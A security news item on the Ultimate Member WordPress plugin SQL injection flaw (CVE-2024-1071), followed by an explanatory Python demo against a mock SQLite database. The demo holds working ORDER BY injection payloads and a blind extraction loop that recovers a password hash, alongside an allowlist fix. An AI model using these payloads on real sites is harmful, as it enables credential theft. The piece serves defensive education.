WordPress Plugin Alert – Critical SQLi Vulnerability Threatens 200K+ Websites

February 27, 2024 at 01:09AM

A critical security flaw (CVE-2024-1071) has been disclosed in the Ultimate Member WordPress plugin that allows unauthenticated attackers to perform SQL injection and extract sensitive data from the site's database. The issue was fixed in version 2.8.3 following responsible disclosure, and site owners are strongly advised to update to that version or later.

Key Takeaways:

1. A critical security flaw has been disclosed in the WordPress plugin Ultimate Member (CVE-2024-1071), rated CVSS 9.8 (critical). It affects versions 2.1.3 through 2.8.2 and stems from insufficient escaping and preparation of the user-supplied 'sorting' parameter in an existing SQL query, allowing unauthenticated attackers to inject SQL and extract sensitive data from the database.

2. The issue only affects users who have checked the “Enable custom table for usermeta” option in the plugin settings.

3. A fix for the flaw was released as version 2.8.3 on February 19, 2024. Users are urged to update immediately: Wordfence reports that it has already blocked an attack attempting to exploit the flaw, so in-the-wild exploitation should be expected.

4. A previous flaw in the same plugin (CVE-2023-3460) was actively exploited by threat actors to create rogue administrator users and seize control of vulnerable sites.

5. A separate campaign uses compromised WordPress sites to inject crypto drainers or redirect visitors to Web3 phishing sites.

6. A new drainer-as-a-service (DaaS) scheme called CG (short for CryptoGrab), backed by a 10,000-member affiliate program, has been discovered and presents a significant risk to website owners and to their users' assets.

7. Threat actors have been using Telegram bots to facilitate fraudulent operations, including domain cloning and setting wallet addresses for scam funds.

These takeaways underline the urgency for WordPress site owners to update the Ultimate Member plugin and to remain vigilant against both the SQL injection flaw and the fraud tactics described above.
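To make the class of bug concrete, the following is an added example written for this page; it is not the plugin's code and does not reproduce the actual vulnerable query. It models the pattern the advisory describes, a user-controlled sort expression spliced into the ORDER BY clause of a query against a custom usermeta table, using an in-memory SQLite database in place of MySQL. The table and column names (wp_um_metadata, um_key, um_value), the sample rows and the password-hash strings are all constructed for the example. It shows why placeholders alone would not have fixed this (ORDER BY column names cannot be bound parameters in MySQL or in $wpdb->prepare()), how an attacker with no account can read a password hash character by character purely from the order of the returned rows, and the allowlist that closes the hole.

```python
import sqlite3

# Constructed sample data: a WordPress users table plus a custom usermeta table of the
# kind the "Enable custom table for usermeta" option creates. Table and column names
# are assumptions for this example, not the plugin's real schema.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
CREATE TABLE wp_um_metadata (
    umeta_id INTEGER PRIMARY KEY, user_id INTEGER, um_key TEXT, um_value TEXT);
INSERT INTO wp_users VALUES
    (1, 'admin', '$P$BsecretHashAdmin'),
    (2, 'bob',   '$P$BsecretHashBob'),
    (3, 'carol', '$P$BsecretHashCarol');
INSERT INTO wp_um_metadata VALUES
    (1, 1, 'first_name', 'Alice'),
    (2, 2, 'first_name', 'Bob'),
    (3, 3, 'first_name', 'Carol');
"""


def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_member_query(con, sorting):
    """Vulnerable pattern: the request's sort expression is spliced into ORDER BY.

    ORDER BY cannot be a bound parameter, so $wpdb->prepare()-style placeholders
    would not help here; only validating the value does.
    """
    sql = ("SELECT user_id FROM wp_um_metadata WHERE um_key = 'first_name' "
           f"ORDER BY {sorting}")
    return [row[0] for row in con.execute(sql)]


# Hardened pattern: map the public sort key onto a fixed column via an allowlist
# (hypothetical keys chosen for the example).
ALLOWED_SORT = {"user_id": "user_id", "first_name": "um_value"}


def hardened_member_query(con, sorting, direction="ASC"):
    column = ALLOWED_SORT.get(sorting)
    if column is None:
        raise ValueError(f"unsupported sort key: {sorting!r}")
    direction = "DESC" if str(direction).upper() == "DESC" else "ASC"
    sql = ("SELECT user_id FROM wp_um_metadata WHERE um_key = ? "
           f"ORDER BY {column} {direction}")
    return [row[0] for row in con.execute(sql, ("first_name",))]


def blind_extract_password_hash(con, target_id=1, max_len=64):
    """Boolean-based blind extraction through the vulnerable ORDER BY.

    Each payload sorts ascending when the guessed character matches and
    descending when it does not, so the row order leaks one character per hit.
    """
    alphabet = ("$./abcdefghijklmnopqrstuvwxyz"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
    baseline = vulnerable_member_query(con, "user_id ASC")
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            payload = (
                f"(CASE WHEN (SELECT substr(user_pass,{pos},1) FROM wp_users "
                f"WHERE ID={target_id})='{ch}' THEN user_id ELSE -user_id END)")
            if vulnerable_member_query(con, payload) == baseline:
                hit = ch
                break
        if hit is None:          # no character matched: end of the value
            break
        recovered += hit
    return recovered


def run_demo():
    con = open_db()
    # A deliberately wrong guess ('x') flips the row order; a right guess keeps it.
    injected = ("(CASE WHEN (SELECT substr(user_pass,1,1) FROM wp_users WHERE ID=1)='x' "
                "THEN user_id ELSE -user_id END)")
    try:
        hardened_member_query(con, injected)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "baseline": vulnerable_member_query(con, "user_id ASC"),
        "injected_wrong_guess": vulnerable_member_query(con, injected),
        "hardened_rejects_payload": rejected,
        "hardened_sorted_by_name": hardened_member_query(con, "first_name", "DESC"),
        "recovered_hash": blind_extract_password_hash(con),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The takeaway for plugin authors is the shape of the fix rather than the specific payload: any identifier that reaches a query (column names, sort direction, table suffixes) must be resolved through a fixed mapping before it touches SQL, and escaping functions such as esc_sql() are not a substitute, since the injected text here never needs to break out of a quoted string.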
